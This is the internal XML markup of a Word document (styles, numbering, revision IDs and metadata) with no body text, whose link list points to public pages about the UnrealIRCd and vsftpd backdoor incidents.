      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4.%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="1080"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="Times New Roman"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1800" w:hanging="1440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="Times New Roman"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1800" w:hanging="1440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="Times New Roman"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="1800"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="Times New Roman"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8.%9."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="1800"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="Times New Roman"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7C6458EC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4F421D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280201">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="375395912">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="203640177">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1547185268">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1380982619">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="172847181">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1512909472">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1601599413">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="711227726">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1577131342">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1645086855">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="987631440">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1519125348">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1551839161">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1218467532">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="123083297">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="5821801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00D3"/>
    <w:rsid w:val="00000C1F"/>
    <w:rsid w:val="00003ED4"/>
    <w:rsid w:val="00010B56"/>
    <w:rsid w:val="00013966"/>
    <w:rsid w:val="0002259B"/>
    <w:rsid w:val="000378B9"/>
    <w:rsid w:val="00042BB4"/>
    <w:rsid w:val="00053DE1"/>
    <w:rsid w:val="000656C6"/>
    <w:rsid w:val="00074533"/>
    <w:rsid w:val="0008219C"/>
    <w:rsid w:val="000A0158"/>
    <w:rsid w:val="000A6E4B"/>
    <w:rsid w:val="000B25C8"/>
    <w:rsid w:val="000D0CB5"/>
    <w:rsid w:val="000E1E0A"/>
    <w:rsid w:val="000F1FB8"/>
    <w:rsid w:val="00107F0B"/>
    <w:rsid w:val="00107FAE"/>
    <w:rsid w:val="00110871"/>
    <w:rsid w:val="00127DE1"/>
    <w:rsid w:val="001350E8"/>
    <w:rsid w:val="00137F82"/>
    <w:rsid w:val="00150E39"/>
    <w:rsid w:val="00153DE5"/>
    <w:rsid w:val="001572F3"/>
    <w:rsid w:val="00157A71"/>
    <w:rsid w:val="00165FC0"/>
    <w:rsid w:val="001700D3"/>
    <w:rsid w:val="00174B2E"/>
    <w:rsid w:val="00191F34"/>
    <w:rsid w:val="00193973"/>
    <w:rsid w:val="001A6B4A"/>
    <w:rsid w:val="001A6EFA"/>
    <w:rsid w:val="001B4BF9"/>
    <w:rsid w:val="001B59D1"/>
    <w:rsid w:val="001D1EE9"/>
    <w:rsid w:val="001E04C1"/>
    <w:rsid w:val="001E14A2"/>
    <w:rsid w:val="001E20DE"/>
    <w:rsid w:val="001E24E5"/>
    <w:rsid w:val="00210C18"/>
    <w:rsid w:val="0021333E"/>
    <w:rsid w:val="00215231"/>
    <w:rsid w:val="0021627E"/>
    <w:rsid w:val="00216483"/>
    <w:rsid w:val="00220388"/>
    <w:rsid w:val="0022763F"/>
    <w:rsid w:val="00241D66"/>
    <w:rsid w:val="0025697F"/>
    <w:rsid w:val="00261F30"/>
    <w:rsid w:val="002623F5"/>
    <w:rsid w:val="00265437"/>
    <w:rsid w:val="00271587"/>
    <w:rsid w:val="0027438F"/>
    <w:rsid w:val="0027638B"/>
    <w:rsid w:val="00293DC1"/>
    <w:rsid w:val="002953AF"/>
    <w:rsid w:val="00297575"/>
    <w:rsid w:val="0029776A"/>
    <w:rsid w:val="002B4735"/>
    <w:rsid w:val="002C0AE4"/>
    <w:rsid w:val="002C27BF"/>
    <w:rsid w:val="002D069C"/>
    <w:rsid w:val="002D21EC"/>
    <w:rsid w:val="002D31E9"/>
    <w:rsid w:val="002D3576"/>
    <w:rsid w:val="002E6F70"/>
    <w:rsid w:val="002E71E0"/>
    <w:rsid w:val="002F7E0E"/>
    <w:rsid w:val="00300668"/>
    <w:rsid w:val="003007A0"/>
    <w:rsid w:val="00303B7F"/>
    <w:rsid w:val="00306278"/>
    <w:rsid w:val="00313F48"/>
    <w:rsid w:val="00317951"/>
    <w:rsid w:val="00322B50"/>
    <w:rsid w:val="00323880"/>
    <w:rsid w:val="003243A5"/>
    <w:rsid w:val="00345679"/>
    <w:rsid w:val="0035629B"/>
    <w:rsid w:val="003663B5"/>
    <w:rsid w:val="003A005E"/>
    <w:rsid w:val="003A7E2A"/>
    <w:rsid w:val="003E0EE1"/>
    <w:rsid w:val="003F57F6"/>
    <w:rsid w:val="00403E85"/>
    <w:rsid w:val="00411543"/>
    <w:rsid w:val="00432466"/>
    <w:rsid w:val="004366F8"/>
    <w:rsid w:val="00437881"/>
    <w:rsid w:val="00442F10"/>
    <w:rsid w:val="004438EE"/>
    <w:rsid w:val="00452425"/>
    <w:rsid w:val="00452E7C"/>
    <w:rsid w:val="004558A7"/>
    <w:rsid w:val="004660B5"/>
    <w:rsid w:val="00474658"/>
    <w:rsid w:val="00475599"/>
    <w:rsid w:val="00482A11"/>
    <w:rsid w:val="004916D1"/>
    <w:rsid w:val="0049653B"/>
    <w:rsid w:val="004B0F8F"/>
    <w:rsid w:val="004B1C5B"/>
    <w:rsid w:val="004B6A4E"/>
    <w:rsid w:val="004C1EA1"/>
    <w:rsid w:val="004C6525"/>
    <w:rsid w:val="004E29E1"/>
    <w:rsid w:val="004E43D5"/>
    <w:rsid w:val="004F2A75"/>
    <w:rsid w:val="005028AD"/>
    <w:rsid w:val="005276E9"/>
    <w:rsid w:val="00543F86"/>
    <w:rsid w:val="00550EF1"/>
    <w:rsid w:val="00552BF8"/>
    <w:rsid w:val="005547C9"/>
    <w:rsid w:val="00556142"/>
    <w:rsid w:val="005567DF"/>
    <w:rsid w:val="005757BE"/>
    <w:rsid w:val="0058196C"/>
    <w:rsid w:val="00582882"/>
    <w:rsid w:val="00584984"/>
    <w:rsid w:val="0058631D"/>
    <w:rsid w:val="005A6008"/>
    <w:rsid w:val="005B4650"/>
    <w:rsid w:val="005C13BA"/>
    <w:rsid w:val="005C1CEF"/>
    <w:rsid w:val="005C441B"/>
    <w:rsid w:val="005C6B43"/>
    <w:rsid w:val="005D2981"/>
    <w:rsid w:val="005F0F99"/>
    <w:rsid w:val="005F2719"/>
    <w:rsid w:val="005F3D0B"/>
    <w:rsid w:val="005F4B44"/>
    <w:rsid w:val="0060146D"/>
    <w:rsid w:val="00607DC0"/>
    <w:rsid w:val="0061180B"/>
    <w:rsid w:val="006217B3"/>
    <w:rsid w:val="00624E55"/>
    <w:rsid w:val="00627339"/>
    <w:rsid w:val="00635B32"/>
    <w:rsid w:val="006474E6"/>
    <w:rsid w:val="00652CAA"/>
    <w:rsid w:val="006637C1"/>
    <w:rsid w:val="006747DF"/>
    <w:rsid w:val="006753E9"/>
    <w:rsid w:val="00677286"/>
    <w:rsid w:val="0069502D"/>
    <w:rsid w:val="00697D3C"/>
    <w:rsid w:val="006A279C"/>
    <w:rsid w:val="006B66B3"/>
    <w:rsid w:val="006D496C"/>
    <w:rsid w:val="006E1393"/>
    <w:rsid w:val="006E3789"/>
    <w:rsid w:val="006E4990"/>
    <w:rsid w:val="006F17EE"/>
    <w:rsid w:val="006F501E"/>
    <w:rsid w:val="00700544"/>
    <w:rsid w:val="0070587D"/>
    <w:rsid w:val="00705AC5"/>
    <w:rsid w:val="00705BA0"/>
    <w:rsid w:val="00720625"/>
    <w:rsid w:val="00731B72"/>
    <w:rsid w:val="00734D95"/>
    <w:rsid w:val="007453FB"/>
    <w:rsid w:val="00753948"/>
    <w:rsid w:val="00757A19"/>
    <w:rsid w:val="007652DB"/>
    <w:rsid w:val="007915F5"/>
    <w:rsid w:val="007938C6"/>
    <w:rsid w:val="007A2272"/>
    <w:rsid w:val="007A2AF3"/>
    <w:rsid w:val="007B553B"/>
    <w:rsid w:val="007C52CB"/>
    <w:rsid w:val="007D090F"/>
    <w:rsid w:val="007E668B"/>
    <w:rsid w:val="007F24C5"/>
    <w:rsid w:val="00801E84"/>
    <w:rsid w:val="008028FE"/>
    <w:rsid w:val="008164B0"/>
    <w:rsid w:val="0083293E"/>
    <w:rsid w:val="008553C8"/>
    <w:rsid w:val="008639A4"/>
    <w:rsid w:val="00872E6F"/>
    <w:rsid w:val="00876D9A"/>
    <w:rsid w:val="008801AB"/>
    <w:rsid w:val="00883399"/>
    <w:rsid w:val="008902B0"/>
    <w:rsid w:val="008A64A0"/>
    <w:rsid w:val="008C620B"/>
    <w:rsid w:val="008D280D"/>
    <w:rsid w:val="008D723B"/>
    <w:rsid w:val="008E1AD0"/>
    <w:rsid w:val="008F3A57"/>
    <w:rsid w:val="008F6494"/>
    <w:rsid w:val="009068F1"/>
    <w:rsid w:val="009072FF"/>
    <w:rsid w:val="00920704"/>
    <w:rsid w:val="00922004"/>
    <w:rsid w:val="00931B29"/>
    <w:rsid w:val="00933806"/>
    <w:rsid w:val="009370E2"/>
    <w:rsid w:val="00944876"/>
    <w:rsid w:val="00945076"/>
    <w:rsid w:val="00951C59"/>
    <w:rsid w:val="00991E82"/>
    <w:rsid w:val="009A4715"/>
    <w:rsid w:val="009A4EA1"/>
    <w:rsid w:val="009A60FA"/>
    <w:rsid w:val="009A677B"/>
    <w:rsid w:val="009B48D2"/>
    <w:rsid w:val="009B7A36"/>
    <w:rsid w:val="009C4819"/>
    <w:rsid w:val="009C54E5"/>
    <w:rsid w:val="009C5598"/>
    <w:rsid w:val="009C6108"/>
    <w:rsid w:val="009D7CE0"/>
    <w:rsid w:val="009E0593"/>
    <w:rsid w:val="009E49CB"/>
    <w:rsid w:val="009F6AED"/>
    <w:rsid w:val="00A30420"/>
    <w:rsid w:val="00A42245"/>
    <w:rsid w:val="00A447F1"/>
    <w:rsid w:val="00A56FF3"/>
    <w:rsid w:val="00A60A2B"/>
    <w:rsid w:val="00A623A6"/>
    <w:rsid w:val="00A64FE3"/>
    <w:rsid w:val="00A659C0"/>
    <w:rsid w:val="00A7617B"/>
    <w:rsid w:val="00A939C4"/>
    <w:rsid w:val="00AA344A"/>
    <w:rsid w:val="00AA5BBB"/>
    <w:rsid w:val="00AA5BCE"/>
    <w:rsid w:val="00AB0B7B"/>
    <w:rsid w:val="00AB24AD"/>
    <w:rsid w:val="00AB5A3B"/>
    <w:rsid w:val="00AB75F2"/>
    <w:rsid w:val="00AC101E"/>
    <w:rsid w:val="00AC44B6"/>
    <w:rsid w:val="00AE7B2B"/>
    <w:rsid w:val="00B0395B"/>
    <w:rsid w:val="00B137F8"/>
    <w:rsid w:val="00B14582"/>
    <w:rsid w:val="00B231E6"/>
    <w:rsid w:val="00B30A5C"/>
    <w:rsid w:val="00B310F2"/>
    <w:rsid w:val="00B3742B"/>
    <w:rsid w:val="00B423BA"/>
    <w:rsid w:val="00B4507D"/>
    <w:rsid w:val="00B45BD6"/>
    <w:rsid w:val="00B5456E"/>
    <w:rsid w:val="00B55EF8"/>
    <w:rsid w:val="00B56E16"/>
    <w:rsid w:val="00B741AA"/>
    <w:rsid w:val="00B74A20"/>
    <w:rsid w:val="00B80B6B"/>
    <w:rsid w:val="00B820E7"/>
    <w:rsid w:val="00B958F8"/>
    <w:rsid w:val="00BA7EE1"/>
    <w:rsid w:val="00BC7949"/>
    <w:rsid w:val="00BD1775"/>
    <w:rsid w:val="00BD6073"/>
    <w:rsid w:val="00BD6D7B"/>
    <w:rsid w:val="00C1046D"/>
    <w:rsid w:val="00C134B2"/>
    <w:rsid w:val="00C17FBB"/>
    <w:rsid w:val="00C222C5"/>
    <w:rsid w:val="00C31E19"/>
    <w:rsid w:val="00C41334"/>
    <w:rsid w:val="00C46F3D"/>
    <w:rsid w:val="00C53644"/>
    <w:rsid w:val="00C55538"/>
    <w:rsid w:val="00C60AE6"/>
    <w:rsid w:val="00C7239F"/>
    <w:rsid w:val="00C729D5"/>
    <w:rsid w:val="00C763C4"/>
    <w:rsid w:val="00C77619"/>
    <w:rsid w:val="00C80169"/>
    <w:rsid w:val="00C8249B"/>
    <w:rsid w:val="00C84FB8"/>
    <w:rsid w:val="00C87CD1"/>
    <w:rsid w:val="00C90A21"/>
    <w:rsid w:val="00CA5AC8"/>
    <w:rsid w:val="00CA78BB"/>
    <w:rsid w:val="00CC09C3"/>
    <w:rsid w:val="00CC5615"/>
    <w:rsid w:val="00CE1E79"/>
    <w:rsid w:val="00CF2D47"/>
    <w:rsid w:val="00D127F7"/>
    <w:rsid w:val="00D16EED"/>
    <w:rsid w:val="00D1755B"/>
    <w:rsid w:val="00D317E9"/>
    <w:rsid w:val="00D34404"/>
    <w:rsid w:val="00D3684E"/>
    <w:rsid w:val="00D64AB7"/>
    <w:rsid w:val="00D759B5"/>
    <w:rsid w:val="00D77D22"/>
    <w:rsid w:val="00D8055A"/>
    <w:rsid w:val="00DC2336"/>
    <w:rsid w:val="00DC2381"/>
    <w:rsid w:val="00DD1945"/>
    <w:rsid w:val="00DD5B85"/>
    <w:rsid w:val="00DD64EE"/>
    <w:rsid w:val="00DF08E2"/>
    <w:rsid w:val="00E03A92"/>
    <w:rsid w:val="00E055BB"/>
    <w:rsid w:val="00E17695"/>
    <w:rsid w:val="00E2617B"/>
    <w:rsid w:val="00E42F37"/>
    <w:rsid w:val="00E71C5B"/>
    <w:rsid w:val="00E733CA"/>
    <w:rsid w:val="00E7640B"/>
    <w:rsid w:val="00EA0E14"/>
    <w:rsid w:val="00EB7156"/>
    <w:rsid w:val="00EC38E2"/>
    <w:rsid w:val="00EC67DB"/>
    <w:rsid w:val="00EC781D"/>
    <w:rsid w:val="00EC788D"/>
    <w:rsid w:val="00EC7D67"/>
    <w:rsid w:val="00ED0AFC"/>
    <w:rsid w:val="00ED1381"/>
    <w:rsid w:val="00ED536F"/>
    <w:rsid w:val="00EF3A6A"/>
    <w:rsid w:val="00EF602D"/>
    <w:rsid w:val="00F0282B"/>
    <w:rsid w:val="00F0450F"/>
    <w:rsid w:val="00F045EB"/>
    <w:rsid w:val="00F14264"/>
    <w:rsid w:val="00F1495C"/>
    <w:rsid w:val="00F26E72"/>
    <w:rsid w:val="00F30DF7"/>
    <w:rsid w:val="00F45592"/>
    <w:rsid w:val="00F50BED"/>
    <w:rsid w:val="00F63E73"/>
    <w:rsid w:val="00F70B5A"/>
    <w:rsid w:val="00F75549"/>
    <w:rsid w:val="00FA3650"/>
    <w:rsid w:val="00FB037A"/>
    <w:rsid w:val="00FC5FC0"/>
    <w:rsid w:val="00FF542E"/>
    <w:rsid w:val="00FF56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E133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B0F8F"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:qFormat/>
    <w:rsid w:val="001700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8F3A5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C09C3"/>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G-01">
    <w:name w:val="MAG-01"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00B741AA"/>
    <w:pPr>
      <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:lang w:val="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="MAG-2">
    <w:name w:val="MAG-2"/>
    <w:basedOn w:val="ListParagraph"/>
    <w:qFormat/>
    <w:rsid w:val="00B741AA"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:szCs w:val="28"/>
      <w:lang w:val="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00B741AA"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="MAG-3">
    <w:name w:val="MAG-3"/>
    <w:basedOn w:val="ListParagraph"/>
    <w:qFormat/>
    <w:rsid w:val="00B741AA"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="num" w:pos="1848"/>
      </w:tabs>
      <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
      <w:ind w:left="1848"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:lang w:val="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:rsid w:val="001700D3"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="36"/>
      <w:sz w:val="48"/>
      <w:szCs w:val="48"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="001700D3"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="001700D3"/>
    <w:pPr>
      <w:spacing w:before="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="spelle">
    <w:name w:val="spelle"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="001700D3"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="001700D3"/>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BalloonText">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BalloonTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001700D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00D3"/>
    <w:rPr>
      <w:rFonts w:ascii="Lucida Grande" w:eastAsia="Times New Roman" w:hAnsi="Lucida Grande" w:cs="Lucida Grande"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Default">
    <w:name w:val="Default"/>
    <w:rsid w:val="00951C59"/>
    <w:pPr>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:adjustRightInd w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="000000"/>
      <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyTextIndent">
    <w:name w:val="Body Text Indent"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BodyTextIndentChar"/>
    <w:rsid w:val="00951C59"/>
    <w:pPr>
      <w:spacing w:after="120"/>
      <w:ind w:left="360"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BodyTextIndentChar">
    <w:name w:val="Body Text Indent Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BodyTextIndent"/>
    <w:rsid w:val="00951C59"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00CA78BB"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyText">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BodyTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00CA78BB"/>
    <w:pPr>
      <w:spacing w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BodyTextChar">
    <w:name w:val="Body Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BodyText"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00CA78BB"/>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:rsid w:val="005F2719"/>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A677B"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4320"/>
        <w:tab w:val="right" w:pos="8640"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="009A677B"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="PageNumber">
    <w:name w:val="page number"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009A677B"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="008F3A5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CC09C3"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="243F60" w:themeColor="accent1" w:themeShade="7F"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00CC09C3"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="LightList-Accent1">
    <w:name w:val="Light List Accent 1"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="61"/>
    <w:rsid w:val="005C441B"/>
    <w:rPr>
      <w:color w:val="262626"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>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FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00876D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442081">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1052339808">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="18045413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www.rapid7.com/db/modules/exploit/unix/irc/unreal_ircd_3281_backdoor"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carybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.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hyperlink" Target="http://forums.unrealircd.com/viewtopic.php?t=6562" TargetMode="External"/><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786</TotalTime>
  <Pages>13</Pages>
  <Words>2297</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15360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Eligijus</cp:lastModifiedBy>
  <cp:revision>270</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2014-03-19T06:55:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-04-26T08:18:00Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>